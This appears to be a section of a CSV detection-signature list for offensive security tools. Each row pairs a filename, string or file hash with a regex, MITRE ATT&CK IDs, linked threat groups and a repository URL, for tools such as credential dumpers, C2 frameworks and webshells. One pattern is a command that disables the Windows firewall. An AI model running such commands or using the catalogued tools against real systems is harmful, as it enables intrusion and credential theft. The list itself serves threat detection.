"*ADMIN$\System32\CodeIntegrity\SiPolicy.p7b*",".{0,1000}ADMIN\$\\System32\\CodeIntegrity\\SiPolicy\.p7b.{0,1000}","offensive_tool_keyword","Krueger","remotely killing EDR with WDAC","T1562.001 - T1562.004 - T1218.011 - T1548.002 - T1027","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/logangoins/Krueger","1","0","N/A","N/A","9","4","353","42","2025-01-06T06:57:14Z","2024-11-15T20:11:01Z","33454"
"*Admin, your system has been hacked!*",".{0,1000}Admin,\syour\ssystem\shas\sbeen\shacked!.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","33455"
"*admin.kirbi*",".{0,1000}admin\.kirbi.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","33457"
"*admin@cuba-supp.com*",".{0,1000}admin\@cuba\-supp\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","33458"
"*admin_can_be_delegated(self)*",".{0,1000}admin_can_be_delegated\(self\).{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","0","N/A","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","33460"
"*admin_macos_x64 -rhost * -rport *",".{0,1000}admin_macos_x64\s\-rhost\s.{0,1000}\s\-rport\s.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","33461"
"*Admin2Sys.exe*",".{0,1000}Admin2Sys\.exe.{0,1000}","offensive_tool_keyword","Admin2Sys","Admin2Sys it's a C++ malware to escalate privileges from Administrator account to NT AUTORITY SYSTEM","T1055.002 - T1078.003 - T1068","TA0002 - TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/S12cybersecurity/Admin2Sys","1","1","N/A","N/A","10","1","54","19","2023-05-01T19:32:41Z","2023-05-01T18:50:51Z","33463"
"*Admin2Sys-main*",".{0,1000}Admin2Sys\-main.{0,1000}","offensive_tool_keyword","Admin2Sys","Admin2Sys it's a C++ malware to escalate privileges from Administrator account to NT AUTORITY SYSTEM","T1055.002 - T1078.003 - T1068","TA0002 - TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/S12cybersecurity/Admin2Sys","1","1","N/A","N/A","10","1","54","19","2023-05-01T19:32:41Z","2023-05-01T18:50:51Z","33464"
"*AD-miner -*",".{0,1000}AD\-miner\s\-.{0,1000}","offensive_tool_keyword","AD_Miner","AD Miner is an Active Directory audit tool that leverages cypher queries to crunch data from the #Bloodhound graph database to uncover security weaknesses","T1087.002 - T1069 - T1018 - T1595","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/Mazars-Tech/AD_Miner","1","0","N/A","AD Enumeration","7","10","1290","131","2025-03-12T10:53:09Z","2023-09-26T12:36:59Z","33465"
"*Adminisme/ServerScan/*",".{0,1000}Adminisme\/ServerScan\/.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","33466"
"*Administrator privileges required to spoof processes*",".{0,1000}Administrator\sprivileges\srequired\sto\sspoof\sprocesses.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","script content","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","33467"
"*administrator@evilcorp.local*",".{0,1000}administrator\@evilcorp\.local.{0,1000}","offensive_tool_keyword","POC","PoC for the Veeam Recovery Orchestrator Authentication CVE-2024-29855","T1078.001 - T1078.003 - T1078.004 - T1078 - T1189","TA0006 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sinsinology/CVE-2024-29855","1","0","N/A","N/A","10","1","17","7","2024-06-17T10:45:06Z","2024-06-13T08:32:55Z","33468"
"*adnanekhan/Gato-X*",".{0,1000}adnanekhan\/Gato\-X.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","1","N/A","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","33469"
"*adobe_top100_pass.txt*",".{0,1000}adobe_top100_pass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","33470"
"*AdPassHunt (PUA)*",".{0,1000}AdPassHunt\s\(PUA\).{0,1000}","offensive_tool_keyword","ADPassHunt","credential stealer tool that hunts Active Directory credentials (leaked tool Developed In-house for Fireeyes Red Team)","T1003.003 - T1552.006","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.virustotal.com/gui/file/73233ca7230fb5848e220723caa06d795a14c0f1f42c6a59482e812bfb8c217f","1","0","#Avsignature","N/A","10","10","N/A","N/A","N/A","N/A","33471"
"*ADPassHunt.exe*",".{0,1000}ADPassHunt\.exe.{0,1000}","offensive_tool_keyword","ADPassHunt","credential stealer tool that hunts Active Directory credentials (leaked tool Developed In-house for Fireeyes Red Team)","T1003.003 - T1552.006","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.virustotal.com/gui/file/73233ca7230fb5848e220723caa06d795a14c0f1f42c6a59482e812bfb8c217f","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","33472"
"*adsearch* --domain-admins*",".{0,1000}adsearch.{0,1000}\s\-\-domain\-admins.{0,1000}","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","0","N/A","N/A","N/A","6","536","57","2024-09-25T16:13:13Z","2020-06-17T22:21:41Z","33481"
"*adsearch.exe*",".{0,1000}adsearch\.exe.{0,1000}","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","N/A","6","536","57","2024-09-25T16:13:13Z","2020-06-17T22:21:41Z","33482"
"*ADSearch.exe*",".{0,1000}ADSearch\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","33483"
"*ADSearch.sln*",".{0,1000}ADSearch\.sln.{0,1000}","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","N/A","6","536","57","2024-09-25T16:13:13Z","2020-06-17T22:21:41Z","33484"
"*ADSearch\ADSearch.cs*",".{0,1000}ADSearch\\ADSearch\.cs.{0,1000}","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","0","N/A","N/A","N/A","6","536","57","2024-09-25T16:13:13Z","2020-06-17T22:21:41Z","33485"
"*adsearch-master.zip",".{0,1000}adsearch\-master\.zip","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","N/A","6","536","57","2024-09-25T16:13:13Z","2020-06-17T22:21:41Z","33486"
"*ADSync passwords can be read or modified as local administrator only for ADSync version *",".{0,1000}ADSync\spasswords\scan\sbe\sread\sor\smodified\sas\slocal\sadministrator\sonly\sfor\sADSync\sversion\s.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - T1110","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","0","N/A","N/A","10","1","39","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z","33487"
"*ADSyncDecrypt.exe*",".{0,1000}ADSyncDecrypt\.exe.{0,1000}","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","N/A","10","7","668","88","2024-11-10T22:00:16Z","2019-04-09T07:41:42Z","33488"
"*ADSyncDecrypt.exe*",".{0,1000}ADSyncDecrypt\.exe.{0,1000}","offensive_tool_keyword","ADSyncDecrypt","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","ADSyncDecrypt","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","33489"
"*ADSyncDecrypt.exe*",".{0,1000}ADSyncDecrypt\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","ADSyncDecrypt","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","33490"
"*ADSyncGather.exe*",".{0,1000}ADSyncGather\.exe.{0,1000}","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","N/A","10","7","668","88","2024-11-10T22:00:16Z","2019-04-09T07:41:42Z","33491"
"*ADSyncQuery*ADSync.mdf*.txt*",".{0,1000}ADSyncQuery.{0,1000}ADSync\.mdf.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","0","N/A","N/A","10","7","668","88","2024-11-10T22:00:16Z","2019-04-09T07:41:42Z","33492"
"*Advanced.AV.Evasion.Tool.For.Red.Team.exe*",".{0,1000}Advanced\.AV\.Evasion\.Tool\.For\.Red\.Team\.exe.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","1","N/A","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","33499"
"*Advanced-SQL-Injection-Cheatsheet*",".{0,1000}Advanced\-SQL\-Injection\-Cheatsheet.{0,1000}","offensive_tool_keyword","Advanced-SQL-Injection-Cheatsheet","A cheat sheet that contains advanced queries for SQL Injection of all types.","T1071.001 - T1190 - T1059.007 - T1040","TA0001 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/kleiton0x00/Advanced-SQL-Injection-Cheatsheet","1","1","N/A","N/A","N/A","10","3003","678","2023-05-13T17:15:20Z","2020-10-23T18:14:47Z","33505"
"*advantech_iview_networkservlet_cmd_inject.*",".{0,1000}advantech_iview_networkservlet_cmd_inject\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","33506"
"*Advfirewall set allprofiles state off*",".{0,1000}Advfirewall\sset\sallprofiles\sstate\soff.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","33507"
"*adxcsouf2john.py*",".{0,1000}adxcsouf2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","33510"
"*ADZero.py*",".{0,1000}ADZero\.py.{0,1000}","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1072","TA0001 - TA0009","N/A","N/A","Exploitation tool","https://github.com/Privia-Security/ADZero","1","1","N/A","N/A","N/A","1","22","7","2020-10-02T13:00:21Z","2020-09-29T20:43:06Z","33511"
"*ae04b0978a3e8179a0d2c1cd4a78fcb58fd1c3e8d5984ec1d8e9aa0881702676*",".{0,1000}ae04b0978a3e8179a0d2c1cd4a78fcb58fd1c3e8d5984ec1d8e9aa0881702676.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","33512"
"*ae094ee177fac926d832755352a3d0fff4804e513cefc430d5987936ff493b92*",".{0,1000}ae094ee177fac926d832755352a3d0fff4804e513cefc430d5987936ff493b92.{0,1000}","offensive_tool_keyword","chunk-Proxy","A backdoor installed on a web server that allows for the execution of commands and facilitates persistent access.","T1505.003 - T1059 - T1105 - T1071","TA0011 - TA0002 - TA0003","Ghost Ransomware","N/A","C2","https://github.com/BeichenDream/Chunk-Proxy","1","0","#filehash","N/A","10","10","283","40","2022-05-07T04:24:50Z","2021-10-28T18:45:21Z","33513"
"*ae0c6e80d9f3f42919797ee71830ead3490530bdabc1baaa6e5990115bf54d16*",".{0,1000}ae0c6e80d9f3f42919797ee71830ead3490530bdabc1baaa6e5990115bf54d16.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","33515"
"*ae0d5b4ee3612accbbf88d53c4ae042ffcccca75a6ca0c8b352a3c7d7d2f34a5*",".{0,1000}ae0d5b4ee3612accbbf88d53c4ae042ffcccca75a6ca0c8b352a3c7d7d2f34a5.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","33516"
"*ae0dcb27348bfae6db1ef03803f267b4c9729d8ff8c9eff70fcff5a3d4b10384*",".{0,1000}ae0dcb27348bfae6db1ef03803f267b4c9729d8ff8c9eff70fcff5a3d4b10384.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","33517"
"*ae136c5aa1e9a4524f30350fc8fc45993e2a81d0ffab2d7c4bd0f9ae7cea2060*",".{0,1000}ae136c5aa1e9a4524f30350fc8fc45993e2a81d0ffab2d7c4bd0f9ae7cea2060.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#filehash","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","33518"
"*ae153d08924fd9da1a2419a7cabf75db4eba8996ebd7552d5a4742b7e4d2df45*",".{0,1000}ae153d08924fd9da1a2419a7cabf75db4eba8996ebd7552d5a4742b7e4d2df45.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","33519"
"*ae17da575c55344775eb7b9d6d429265097a5bc90392862e0daea221e983d5fe*",".{0,1000}ae17da575c55344775eb7b9d6d429265097a5bc90392862e0daea221e983d5fe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","33520"
"*ae18dc1b4124abbbd1eaff296cedaa2e8d6ef2ad1070b537f1963355cd1cd769*",".{0,1000}ae18dc1b4124abbbd1eaff296cedaa2e8d6ef2ad1070b537f1963355cd1cd769.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","33521"
"*ae19fadd759b7d9bd55fb0aebf9c903d129f9ca13c0240c7b1dc53c0c934fe14*",".{0,1000}ae19fadd759b7d9bd55fb0aebf9c903d129f9ca13c0240c7b1dc53c0c934fe14.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","33522"
"*ae205d0552b3a1a407d43025a1b85de9de6c9edaf7690aae3ef8ca03b07ec4a9*",".{0,1000}ae205d0552b3a1a407d43025a1b85de9de6c9edaf7690aae3ef8ca03b07ec4a9.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","33523"
"*ae219371bbfc41040dc9150b688271b9cd51cb325e4c328f954a6b474dfb019d*",".{0,1000}ae219371bbfc41040dc9150b688271b9cd51cb325e4c328f954a6b474dfb019d.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","33524"
"*ae2342b247b29e9e790ef5ca3bff74f49167b54a0c846321fb5e7e24bf892d74*",".{0,1000}ae2342b247b29e9e790ef5ca3bff74f49167b54a0c846321fb5e7e24bf892d74.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","33525"
"*ae23c8ef1b6f0106c344867ca48101e1c94834e4e2b667879eb99aef0e4cbcf1*",".{0,1000}ae23c8ef1b6f0106c344867ca48101e1c94834e4e2b667879eb99aef0e4cbcf1.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","33526"
